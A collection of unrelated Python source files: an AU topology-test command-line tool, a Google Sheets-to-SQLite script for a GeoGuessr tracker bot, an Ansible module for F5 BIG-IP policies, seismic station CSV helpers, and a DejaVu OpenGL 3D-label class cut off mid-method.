with open(outfile, 'w') as o:
o.write('P-value: {:.4f}\n'
'Tree1: {}\n'
'Tree2: {}\n'.format(aup, t1, t2))
except OSError as err:
error('Save AU TEST result to file failed due to:\n'
'\t{}'.format(outfile, err))
return aup, t1, t2
def main():
des = 'Perform topology test (AU test) over protein alignments.'
epilog = """
The minimum requirement for running iMC-aut is an executable of a AU test
program, a multiple sequence alignment (MSA) file (in FASTA format), a tree
file (in NEWICK format).
If you only provide one tree in the tree file, a maximum-likelihood tree will
be inferred and AU-TEST will be performed to test the difference between them.
If a set of trees in NEWICK format was provided in the tree file, only these
trees will be evaluated without reconstructing the ML tree. In both case, only
the p-value of AU TEST for the first tree will be printed out.
Without providing a output file path, AU test results will not be saved to
local file system, but the results will be always printed out.
"""
formatter = argparse.RawDescriptionHelpFormatter
parse = argparse.ArgumentParser(description=des, prog='ProtParCon-aut',
usage='%(prog)s EXE MSA TREE [OPTIONS]',
formatter_class=formatter, epilog=epilog)
parse.add_argument('EXE',
help='Path to the executable of the topology test (AU '
'test) program.')
parse.add_argument('MSA',
help='Path to the alignment file in FASTA format.')
parse.add_argument('TREE',
help='Path to the tree file or string in NEWICK format.')
parse.add_argument('-m', '--model',
help='Name of the substitution model or filename of the '
'model file.')
parse.add_argument('-o', '--output',
help='Path to the output file.')
parse.add_argument('-s', '--seed',
help='The seed for initiating the random number '
'generator.')
parse.add_argument('-v', '--verbose', action='store_true',
help='Invoke verbose or silent (default) process mode.')
args = parse.parse_args()
msa, tree, exe, model = args.MSA, args.TREE, args.EXE, args.model
aup, t1, t2 = aut(exe, msa, tree, model=model, seed=args.seed,
outfile=args.out, verbose=args.verbose)
print(aup)
print(t1)
print(t2)
if __name__ == '__main__':
main()
|
from __future__ import print_function
import httplib2
import sys, os
import re
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
import sqlite3
from .AddScoresToDatabase import convertTitle
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/sheets.googleapis.com-python-quickstart.json
SCOPES = 'https://www.googleapis.com/auth/spreadsheets.readonly'
CLIENT_SECRET_FILE = os.path.join(os.path.dirname(__file__), 'client_secret.json')
APPLICATION_NAME = 'GeoGuessr Tracker Bot'
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'sheets.googleapis.com-python-quickstart.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def overwriteSeriesTitles():
"""
Link to sheet:
https://docs.google.com/spreadsheets/d/1BTO3TI6GxiJmDvMqmafSk5UQs8YDvAafIAv0-h16MOw/edit?usp=sharing
"""
# Get credentials to be able to access the google sheets API
print("Opening spreadsheet to get overwrites.")
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'
'version=v4')
service = discovery.build('sheets', 'v4', http=http,
discoveryServiceUrl=discoveryUrl)
# Set basic info about the spreadsheet
SHEET_ID = '16VxHWb7TwO4mICr42LIP8RuWRsr-rFD2040hUqdb_yY'
RANGE_NAME = 'Overwrites!B2:C'
# Get results from spreadsheet
result = service.spreadsheets().values().get(spreadsheetId=SHEET_ID, range=RANGE_NAME).execute()
values = result.get('values', [])
# Connect to database
database = sqlite3.connect(os.path.join(os.path.dirname(__file__), "database.db"))
cursor = database.cursor()
# Update and print series found in spreadsheet
for row in values:
try:
#print('%s, %s -> %s' % (row[0], row[1], convertTitle(row[1])))
if convertTitle(row[1]) != '':
if cursor.execute("SELECT COUNT(*) FROM ChallengeRankings WHERE SubmissionID = ?", [row[0]]).fetchone()[0] == 1:
#print("Updating records")
cursor.execute("UPDATE ChallengeRankings SET SeriesTitle = ? WHERE SubmissionID = ?", [convertTitle(row[1]), row[0]])
except IndexError:
pass
database.commit()
database.close()
def overwriteBlacklistedUsers():
"""
Link to sheet:
https://docs.google.com/spreadsheets/d/1KAPNJKmc5o5pbCs1cmjymLRMHPAyb2_uX0Dqbcf2sUw/edit?usp=sharing
"""
print("Opening spreadsheet to get blacklisted users.")
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'
'version=v4')
service = discovery.build('sheets', 'v4', http=http,
discoveryServiceUrl=discoveryUrl)
# Set basic info about the spreadsheet
SHEET_ID = '1KAPNJKmc5o5pbCs1cmjymLRMHPAyb2_uX0Dqbcf2sUw'
RANGE_NAME = 'Blacklist!A2:A'
# Get results from spreadsheet
result = service.spreadsheets().values().get(spreadsheetId=SHEET_ID, range=RANGE_NAME).execute()
values = result.get('values', [])
print(values)
# Connect to database
database = sqlite3.connect(os.path.join(os.path.dirname(__file__), "database.db"))
cursor = database.cursor()
cursor.execute("DROP TABLE IF EXISTS BlacklistedUsers")
cursor.execute("CREATE TABLE BlacklistedUsers (Username PRIMARY KEY)")
for row in values:
try:
username = row[0]
print('Adding blacklisted user "' + username + '"')
cursor.execute("INSERT OR REPLACE INTO BlacklistedUsers VALUES (?)", [username])
except IndexError:
pass
database.commit()
database.close()
if __name__ == '__main__':
overwriteBlacklistedUsers()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017 F5 Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {
'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'
}
DOCUMENTATION = '''
---
module: bigip_policy
short_description: Manage general policy configuration on a BIG-IP.
description:
- Manages general policy configuration on a BIG-IP. This module is best
used in conjunction with the C(bigip_policy_rule) module. This module
can handle general configuration like setting the draft state of the policy,
the description, and things unrelated to the policy rules themselves.
It is also the first module that should be used when creating rules as
the C(bigip_policy_rule) module requires a policy parameter.
version_added: "2.4"
options:
description:
description:
- The description to attach to the Partition.
required: False
default: None
name:
description:
- The name of the policy to create.
required: True
state:
description:
- When C(state) is C(present), ensures that the policy exists and is
published. When C(state) is C(absent), ensures that the policy is removed,
even if it is currently drafted. When C(state) is C(draft), ensures that
the policy exists and is drafted.
required: False
default: present
choices:
- present
- absent
- draft
strategy:
description:
- Specifies the method to determine which actions get executed in the
case where there are multiple rules that match. When creating new
policies, the default is C(first).
default: None
required: False
choices:
- first
- all
- best
- Custom strategy
notes:
- Requires the f5-sdk Python package on the host. This is as easy as
pip install f5-sdk
requirements:
- f5-sdk
extends_documentation_fragment: f5
author:
- <NAME> (@caphrim007)
'''
EXAMPLES = '''
vars:
policy_rules:
- name: rule1
actions:
- forward: "yes"
select: "yes"
pool: "pool-svrs"
conditions:
- http_uri: "yes"
path: "yes"
starts-with:
- /euro
ordinal: 8
- name: HomePage
actions:
- forward: yes
select: yes
pool: "pool-svrs"
conditions:
- http-uri: yes
path: yes
starts-with:
- /HomePage/
ordinal: 4
- name: Create policies
bigip_policy:
name: "Policy-Foo"
state: present
delegate_to: localhost
- name: Add a rule to the new policy
bigip_policy_rule:
policy: "Policy-Foo"
name: "ABC"
ordinal: 11
conditions:
- http_uri: "yes"
path: "yes"
starts_with:
- "/ABC"
actions:
- forward: "yes"
select: "yes"
pool: "pool-svrs"
- name: Add multiple rules to the new policy
bigip_policy_rule:
policy: "Policy-Foo"
name: "{{ item.name }}"
ordinal: "{{ item.ordinal }}"
conditions: "{{ item.conditions }}"
actions: "{{ item.actions }}"
with_items:
- policy_rules
'''
import re
from ansible.module_utils.f5_utils import *
from distutils.version import LooseVersion
from icontrol.exceptions import iControlUnexpectedHTTPError
class Parameters(AnsibleF5Parameters):
api_attributes = ['strategy', 'description']
updatables = ['strategy', 'description']
returnables = ['strategy', 'description']
def to_return(self):
result = {}
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
return result
def api_params(self):
result = {}
for api_attribute in self.api_attributes:
if self.api_map is not None and api_attribute in self.api_map:
result[api_attribute] = getattr(self, self.api_map[api_attribute])
else:
result[api_attribute] = getattr(self, api_attribute)
result = self._filter_params(result)
return result
@property
def strategy(self):
if self._values['strategy'] is None:
return None
# Look for 'first' from Ansible or REST
elif self._values['strategy'] == 'first':
return self._get_builtin_strategy('first')
elif 'first-match' in self._values['strategy']:
return str(self._values['strategy'])
# Look for 'all' from Ansible or REST
elif self._values['strategy'] == 'all':
return self._get_builtin_strategy('all')
elif 'all-match' in self._values['strategy']:
return str(self._values['strategy'])
else:
# Look for 'best' from Ansible or REST
if self._values['strategy'] == 'best':
return self._get_builtin_strategy('best')
elif 'best-match' in self._values['strategy']:
return str(self._values['strategy'])
else:
# These are custom strategies. The strategy may include the
# partition, but if it does not, then we add the partition
# that is provided to the module.
return self._get_custom_strategy_name()
def _get_builtin_strategy(self, strategy):
return '/{0}/{1}-match'.format(
self.partition, strategy
)
def _get_custom_strategy_name(self):
strategy = self._values['strategy']
if re.match(r'(\/[a-zA-Z_0-9.-]+){2}', strategy):
return strategy
elif re.match(r'[a-zA-Z_0-9.-]+', strategy):
return '/{0}/{1}'.format(self.partition, strategy)
else:
raise F5ModuleError(
"The provided strategy name is invalid!"
)
@strategy.setter
def strategy(self, value):
self._values['strategy'] = value
class BaseTrafficPolicyManager(object):
def __init__(self, client):
self.client = client
self.have = None
self.want = Parameters(self.client.module.params)
self.changes = Parameters()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = Parameters(changed)
def _update_changed_options(self):
changed = {}
for key in Parameters.updatables:
if getattr(self.want, key) is not None:
attr1 = getattr(self.want, key)
attr2 = getattr(self.have, key)
if attr1 != attr2:
changed[key] = attr1
self.changes = Parameters(changed)
if changed:
return True
return False
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def _validate_creation_parameters(self):
if self.want.strategy is None:
self.want.strategy = 'first'
class SimpleTrafficPolicyManager(BaseTrafficPolicyManager):
def exec_module(self):
changed = False
result = dict()
state = self.want.state
try:
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
except iControlUnexpectedHTTPError as e:
raise F5ModuleError(str(e))
changes = self.changes.to_return()
result.update(**changes)
result.update(dict(changed=changed))
return result
def read_current_from_device(self):
resource = self.client.api.tm.ltm.policys.policy.load(
name=self.want.name,
partition=self.want.partition
)
result = resource.attrs
return Parameters(result)
def exists(self):
return self.client.api.tm.ltm.policys.policy.exists(
name=self.want.name,
partition=self.want.partition
)
def update_on_device(self):
params = self.want.api_params()
resource = self.client.api.tm.ltm.policys.policy.load(
name=self.want.name,
partition=self.want.partition
)
resource.modify(**params)
return resource
def create(self):
self._validate_creation_parameters()
self._set_changed_options()
if self.client.check_mode:
return True
self.update_on_device()
return True
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.client.check_mode:
return True
self.update_on_device()
return True
class ComplexTrafficPolicyManager(BaseTrafficPolicyManager):
def exec_module(self):
changed = False
result = dict()
state = self.want.state
try:
if state in ["present", "draft"]:
changed = self.present()
elif state == "absent":
changed = self.absent()
except iControlUnexpectedHTTPError as e:
raise F5ModuleError(str(e))
changes = self.changes.to_return()
result.update(**changes)
result.update(dict(changed=changed))
return result
def should_update(self):
result = self._update_changed_options()
drafted = self.draft_status_changed()
if any(x is True for x in [result, drafted]):
return True
return False
def draft_status_changed(self):
if self.draft_exists() and self.want.state == 'draft':
drafted = False
elif not self.draft_exists() and self.want.state == 'present':
drafted = False
else:
drafted = True
return drafted
def present(self):
if self.draft_exists() or self.policy_exists():
return self.update()
else:
return self.create()
def read_current_from_device(self):
if self.draft_exists():
resource = self.client.api.tm.ltm.policys.policy.load(
name=self.want.name,
partition=self.want.partition,
subPath = 'Drafts'
)
else:
resource = self.client.api.tm.ltm.policys.policy.load(
name=self.want.name,
partition=self.want.partition
)
result = Parameters(resource.attrs)
return result
def policy_exists(self):
params = dict(
name=self.want.name,
partition=self.want.partition
)
result = self.client.api.tm.ltm.policys.policy.exists(**params)
return result
def draft_exists(self):
params = dict(
name=self.want.name,
partition=self.want.partition,
subPath='Drafts'
)
result = self.client.api.tm.ltm.policys.policy.exists(**params)
return result
def _create_new_policy_draft(self):
params = dict(
name=self.want.name,
partition=self.want.partition,
subPath='Drafts',
strategy=self.want.strategy
)
self.client.api.tm.ltm.policys.policy.create(**params)
return True
def _create_existing_policy_draft(self):
params = dict(
name=self.want.name,
partition=self.want.partition,
)
resource = self.client.api.tm.ltm.policys.policy.load(**params)
resource.draft()
return True
def update_on_device(self):
params = self.want.api_params()
resource = self.client.api.tm.ltm.policys.policy.load(
name=self.want.name,
partition=self.want.partition,
subPath='Drafts'
)
resource.modify(**params)
def publish(self):
resource = self.client.api.tm.ltm.policys.policy.load(
name=self.want.name,
partition=self.want.partition,
subPath='Drafts'
)
resource.publish()
return True
def create(self):
self._validate_creation_parameters()
self._set_changed_options()
if self.client.check_mode:
return True
if not self.draft_exists():
self._create_new_policy_draft()
# Because we always need to modify drafts, "creating on the device"
# is actually identical to just updating.
self.update_on_device()
if self.want.state == 'draft':
return True
else:
return self.publish()
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.client.check_mode:
return True
if not self.draft_exists():
self._create_existing_policy_draft()
if self._update_changed_options():
self.update_on_device()
if self.want.state == 'draft':
return True
else:
return self.publish()
class ModuleManager(object):
def __init__(self, client):
self.client = client
def exec_module(self):
if self.version_is_less_than_12():
manager = self.get_manager('simple_traffic')
else:
manager = self.get_manager('complex_traffic')
return manager.exec_module()
def get_manager(self, type):
if type == 'traffic':
return SimpleTrafficPolicyManager(self.client)
elif type =='complex_traffic':
return ComplexTrafficPolicyManager(self.client)
def version_is_less_than_12(self):
version = self.client.api.tmos_version
if LooseVersion(version) < LooseVersion('12.1.0'):
return True
else:
return False
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
self.argument_spec = dict(
name=dict(
required=True
),
description=dict(
required=False,
default=None
),
strategy=dict(
required=False,
default=None
),
state=dict(
required=False,
default='present',
choices=['absent', 'present', 'draft']
)
)
self.f5_product_name = 'bigip'
def main():
if not HAS_F5SDK:
raise F5ModuleError("The python f5-sdk module is required")
spec = ArgumentSpec()
client = AnsibleF5Client(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
f5_product_name=spec.f5_product_name
)
try:
mm = ModuleManager(client)
results = mm.exec_module()
client.module.exit_json(**results)
except F5ModuleError as e:
client.module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
|
# Copyright 2019 <NAME>
#
# This file is part of StDb.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Tools used in converting a pickled station database file to comma-separated value
(.csv) file. These functions are used in most scripts bundled with this package.
"""
from stdb import StDbElement
from obspy import UTCDateTime
def tocsv(stel=StDbElement):
"""
Subroutine to output an StDbElement to a csv formatted string
Parameters
----------
stel : :class:`~stdb.classes.StDbElement`
Instance of :class:`~stdb.classes.StDbElement` to convert to .csv
Returns
-------
csvstr : str
String representation of the csv content
"""
csvstr = "{0:s}".format(stel.network)
if len(stel.altnet) > 0:
csvstr = csvstr + ":".join(stel.altnet)
csvstr = csvstr + ",{0:s},".format(stel.station)
csvstr = csvstr + ":".join(stel.location)
csvstr = csvstr + ",{0:s},{1:10s},{2:8s},{3:10s},{4:8s},".format(stel.channel, \
stel.startdate.strftime("%Y-%m-%d"), stel.startdate.strftime("%H:%M:%S"), \
stel.enddate.strftime("%Y-%m-%d"),stel.enddate.strftime("%H:%M:%S"))
csvstr = csvstr + "{0:f},{1:f},{2:f},{3:.0f},{4:f},{5:s}".format(stel.latitude, \
stel.longitude, stel.elevation, stel.polarity, stel.azcorr, stel.status)
return csvstr
def fromcsv(line="", lkey=False):
"""
Subroutine to convert a csv format string into an StDbElement
Parameters
----------
line : str
Line to read as csv
lkey : bool
Parameter controlling the length of the key (with or without CHANNEL info)
Returns
-------
key : str
Key associated with each entry in database
entry : :class:`~stdb.classes.StDbElement`
Instance of :class:`~stdb.classes.StDbElement` class
"""
if len(line.split(',')) > 6:
line = line.split(',')
# Networks
nets = line[0].split(':')
if len(nets) == 1:
net = nets[0]
altnet = []
else:
net = nets[0]
altnet = nets[1:]
# Required Station Parameters
stn = line[1]
# Required Location Parameters
loc = line[2].split(':')
# Required Channel Parameters
chn = line[3][0:2]
# Required Timing Parameters
stdt = line[4]; sttm = line[5]; eddt = line[6]; edtm = line[7]
# Required Position Parameters
lat = float(line[8]); lon = float(line[9])
# Set Default values for Optional elements
elev = 0.; pol = 1.; azcor = 0.
if len(line) >= 11:
elev = float(line[10])
if len(line) >= 12:
pol = float(line[11])
if len(line) >= 13:
azcor=float(line[12])
if len(line) == 14:
status = line[13]
# Create Key
if lkey:
key = "{0:s}.{1:s}.{2:2s}".format(net.strip(), stn.strip(), chn.strip())
else:
key = "{0:s}.{1:s}".format(net.strip(), stn.strip())
# Create Elemennt
entry = StDbElement(network=net, altnet=altnet, station=stn, channel=chn, \
location=loc, latitude=lat, longitude=lon, elevation=elev, polarity=pol, \
azcorr=azcor, startdate=UTCDateTime(stdt), enddate=UTCDateTime(eddt), \
restricted_status=status)
return key, entry
else:
return None, None
|
<reponame>bio-hpc/metascreener<gh_stars>1-10
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
########################################################################
#
# Date: May 2006 Authors: <NAME>, <NAME>
#
# <EMAIL>
# <EMAIL>
#
# The Scripps Research Institute (TSRI)
# Molecular Graphics Lab
# La Jolla, CA 92037, USA
#
# Copyright: <NAME>, <NAME> and TSRI
#
#########################################################################
#
# $Header$
#
# $Id$
#
import os
import numpy.oldnumeric as Numeric
import types
import math
import warnings
import Tkinter
import Pmw
from opengltk.OpenGL import GL
from opengltk.extent.utillib import glCleanRotMat
from mglutil.math import rotax
from mglutil.math.VectorModule import Vector
from mglutil.gui.BasicWidgets.Tk.thumbwheel import ThumbWheel
from DejaVu.Geom import Geom
from DejaVu.viewerFns import checkKeywords
from DejaVu import viewerConst
from DejaVu.colorTool import glMaterialWithCheck, resetMaterialMemory
from DejaVu.IndexedPolygons import IndexedPolygons
from pyglf import glf
class GlfLabels(Geom):
"""Class for sets of 3d labels
"""
keywords = Geom.keywords + [
'billboard',
'font',
'fontRotateAngles',
'fontScales',
'fontSpacing',
'fontStyle',
'fontTranslation',
'labelTranslation',
'includeCameraRotationInBillboard',
'labels',
]
bitmapFont3dList = [
# 'arbat.bmf',
# 'arial.bmf',
# 'brushtype.bmf',
# 'chicago.bmf',
# 'courier.bmf',
# 'cricket.bmf',
# 'crystal.bmf',
# 'fixedsys.bmf',
# 'gals.bmf',
# 'greek.bmf',
# 'impact.bmf',
# 'proun.bmf',
# 'techno.bmf',
# 'times_new.bmf'
]
vectorFont3dList = [
'arial1.glf',
'courier1.glf',
'crystal1.glf',
'techno0.glf',
'techno1.glf',
'times_new1.glf',
'aksent1.glf',
'alpine1.glf',
'broadway1.glf',
'chicago1.glf',
'compact1.glf',
'cricket1.glf',
'garamond1.glf',
'gothic1.glf',
'penta1.glf',
'present_script1.glf']
fontList = vectorFont3dList + bitmapFont3dList
fontStyleDict = {
'solid': glf.glfDrawSolidString,
'solid3d': glf.glfDraw3DSolidString,
'wire': glf.glfDrawWiredString,
'wire3d': glf.glfDraw3DWiredString,
}
fontStyleList = fontStyleDict.keys()
def __init__(self, name=None, check=1, **kw):
#print "GlfLabels::__init__"
if not kw.get('shape'):
kw['shape'] = (0,3)
if not kw.get('labels'):
kw['labels'] = ['Aa']
if kw.get('billboard') is None:
kw['billboard'] = True
if kw.get('includeCameraRotationInBillboard') is None:
kw['includeCameraRotationInBillboard'] = False
if not kw.get('font'):
kw['font'] = self.fontList[0]
if not kw.get('fontStyle'):
kw['fontStyle'] = 'solid'
if not kw.get('fontSpacing'):
kw['fontSpacing'] = .2
if not kw.get('fontScales'):
kw['fontScales'] = (1, 1, 1)
if not kw.get('fontRotateAngles'):
kw['fontRotateAngles'] = (0, 0, 0)
if not kw.get('fontTranslation'):
kw['fontTranslation'] = (0, 0, 0)
if not kw.get('labelTranslation'):
kw['labelTranslation'] = None
# Glf initialisations
glf.glfInit()
# usefull glf messages (like "font not found")
glf.glfEnable(glf.GLF_CONSOLE_MESSAGES)
# we manage this through the opengl Z scale. (we have to make a call to glScale anyway)
glf.glfSetSymbolDepth(.8) # .2 is C code default value (it is not deep enough)
#contouring is far from being nice in the glf 1.4 C code! So we don't use it.
#glf.glfDisable(glf.GLF_CONTOURING) # C code default value
#glf.glfDisable(glf.GLF_TEXTURING) # C code default value
# loading BMF fonts has to be done after the context exists
# otherwise nothing appears
self.vectorFonts = {}
self.bitmapFonts = {}
apply( Geom.__init__, (self, name, check), kw)
# make ambient to be same as diffuse
mat = self.materials[GL.GL_FRONT]
mat.getFrom[mat.ambient] = [mat.diffuse, 1.]
self.labelTranslation = None
def Set(self, check=1, redo=1, updateOwnGui=True, **kw):
"""set data for this object
check=1 : verify that all the keywords present can be handle by this func
redo=1 : append self to viewer.objectsNeedingRedo
updateOwnGui=True : allow to update owngui at the end this func
"""
#print "Set glfLabels"
redoFlags = apply( Geom.Set, (self, check, 0), kw )
labels = kw.get('labels')
if labels:
kw.pop('labels')
self.labels = list(labels)
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
billboard = kw.get('billboard')
if billboard is not None:
kw.pop('billboard')
self.billboard = billboard
self.immediateRendering = billboard
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
includeCameraRotationInBillboard = kw.get('includeCameraRotationInBillboard')
if includeCameraRotationInBillboard is not None:
kw.pop('includeCameraRotationInBillboard')
self.includeCameraRotationInBillboard = includeCameraRotationInBillboard
redoFlags |= self._redoFlags['updateOwnGuiFlag']
font = kw.get('font')
if not font is None:
# loading BMF fonts has to be done after the context exists
# otherwise nothing appears
kw.pop('font')
lGlfModulePath = os.path.split(glf.__file__)[-2]
lPathToFonts = lGlfModulePath+os.sep+'fonts'+os.sep
if font in self.vectorFont3dList:
self.fontTypeIsVector = True
if font not in self.vectorFonts:
self.vectorFonts[font] = glf.glfLoadFont(lPathToFonts+font)
self.font = font
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
elif font in self.bitmapFont3dList:
self.fontTypeIsVector = False
if font not in self.bitmapFonts:
self.bitmapFonts[font] = glf.glfLoadBMFFont(lPathToFonts+font)
self.font = font
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
else:
warnings.warn('not a glf font %s'%font)
fontStyle = kw.get('fontStyle')
if fontStyle is not None:
kw.pop('fontStyle')
assert fontStyle in self.fontStyleList
self.fontStyle = fontStyle
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
fontSpacing = kw.get('fontSpacing')
if fontSpacing is not None:
# this set the space between letters
#glf.glfSetSymbolSpace(.2) # C code default value
kw.pop('fontSpacing')
self.fontSpacing = fontSpacing
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
fontScales = kw.get('fontScales')
if fontScales is not None:
kw.pop('fontScales')
self.fontScales = fontScales
redoFlags |= self._redoFlags['redoDisplayListFlag']
fontRotateAngles = kw.get('fontRotateAngles')
if fontRotateAngles is not None:
kw.pop('fontRotateAngles')
self.fontRotateAngles = fontRotateAngles
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
fontTranslation = kw.get('fontTranslation')
if fontTranslation is not None:
kw.pop('fontTranslation')
self.fontTranslation = fontTranslation
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
labelTranslation = kw.get('labelTranslation')
if labelTranslation is not None:
kw.pop('labelTranslation')
assert labelTranslation.shape == self.vertexSet.vertices.array.shape
self.labelTranslation = labelTranslation
redoFlags |= self._redoFlags['redoDisplayListFlag']
redoFlags |= self._redoFlags['updateOwnGuiFlag']
return self.redoNow(redo, updateOwnGui, redoFlags)
def getState(self, full=False):
"""return a dictionary describing this object's state
This dictionary can be passed to the Set method to restore the object's state
"""
state = Geom.getState(self, full).copy()
state.update( self.getSubClassState() )
return state
def getSubClassState(self):
"""return a dictionary describing this object's state
This dictionary can be passed to the Set method to restore the object's state
"""
state = {
'billboard': self.billboard,
'font': self.font,
'fontRotateAngles': self.fontRotateAngles,
'fontScales': self.fontScales,
'fontSpacing': self.fontSpacing,
'fontStyle': self.fontStyle,
'fontTranslation': self.fontTranslation,
'labelTranslation': self.labelTranslation,
'includeCameraRotationInBillboard': self.includeCameraRotationInBillboard,
'labels': self.labels,
}
return state
def Add(self, check=1, redo=1, **kw):
"""Add glfLabels
"""
#print "Add glfLabels"
if __debug__:
if check:
apply( checkKeywords, (self.name,self.keywords), kw)
v = kw.get('vertices')
if v:
self.redoDspLst = 1
labels = kw.get( 'labels')
if labels:
#labels is apparently a tuple
self.labels = self.labels + labels
self.redoDspLst = 1
Geom.Add( self, check=0, redo=0,
vertices = kw.get( 'vertices'),
materials = kw.get( 'materials')
)
if self.viewer and redo:
if self.redoDspLst:
self.viewer.objectsNeedingRedo[self] = None
def drawOne3dTextLine(self, textLine, index):
c = self.vertexSet.vertices.array
n = self.vertexSet.normals.array
if self.labelTranslation is not None:
labelTrans =self.labelTranslation[index]
else:
labelTrans = (0,0,0)
lenn = len(n)
try:
GL.glPushMatrix()
GL.glTranslatef(
float(c[index][0]),
float(c[index][1]),
float(c[index][2]),
)
if self.billboard:
GL.glMultMatrixf(self.billboardRotation)
elif lenn == len(c):
lMat = rotax.rotVectToVect(n[index] , (0,0,1) )
lMat = [
lMat[0][0],
lMat[0][1],
lMat[0][2],
lMat[0][3],
lMat[1][0],
lMat[1][1],
lMat[1][2],
lMat[1][3],
lMat[2][0],
lMat[2][1],
lMat[2][2],
lMat[2][3],
lMat[3][0],
lMat[3][1],
lMat[3][2],
lMat[3][3]
]
GL.glMultMatrixf(lMat)
elif lenn > 0:
GL.glMultMatrixf(self.orientation)
GL.glTranslatef(
float(labelTrans[0]),
float(labelTrans[1]),
float(labelTrans[2]),
)
GL.glTranslatef(
float(self.fontTranslation[0]),
float(self.fontTranslation[1]),
float(self.fontTranslation[2]),
)
GL.glRotatef(float(self.fontRotateAngles[2]),
0.,
0.,
1.,
)
GL.glRotatef(float(self.fontRotateAngles[1]),
0.,
1.,
0.,
)
GL.glRotatef(float(self.fontRotateAngles[0]),
1.,
0.,
0.,
)
if self.fontTypeIsVector:
GL.glScalef(float(self.fontScales[0]),
float(self.fontScales[1]),
float(self.fontScales[2]))
if textLine is not None:
self.fontStyleDict[self.fontStyle](textLine)
else:
GL.glScalef(float(self.fontScales[0])*40,
float(self.fontScales[1])*40,
0) # to be the same size as vector fonts
if textLine is not None:
glf.glfDrawBString(textLine)
finally:
if textLine is None:
lMatrix = GL.glGetDoublev(GL.GL_MODELVIEW_MATRIX)
GL.glPopMatrix()
return lMatrix
else:
GL.glPopMatrix()
def prepareBillboardAndNormalForAllTextLines(self):
if self.billboard:
m = self.GetMatrix()
m = Numeric.reshape(m, (16,))
rot = glCleanRotMat(m) #much faster than self.Decompose4x4(m)
if self.includeCameraRotationInBillboard:
# this permit billboarding even if the camera is not in the Z axis
lCameraTransformation = self.viewer.currentCamera.GetMatrix()
lCameraTransformation = Numeric.reshape(lCameraTransformation, (16,))
lCameraRotation = glCleanRotMat(lCameraTransformation) #much faster than self.Decompose4x4(m)
lCameraRotation = Numeric.transpose(lCameraRotation)
rot = Numeric.dot(lCameraRotation, rot)
rot = Numeric.reshape(rot, (16,))
self.billboardRotation = rot.astype('f')
else:
